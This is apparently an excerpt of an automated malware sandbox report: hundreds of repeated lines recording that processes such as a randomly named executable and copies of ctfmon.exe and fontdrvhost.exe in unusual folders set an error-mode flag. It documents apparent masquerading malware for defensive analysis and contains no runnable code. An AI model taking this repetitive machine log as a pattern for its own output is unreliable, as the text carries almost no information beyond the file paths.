                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Recovery\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
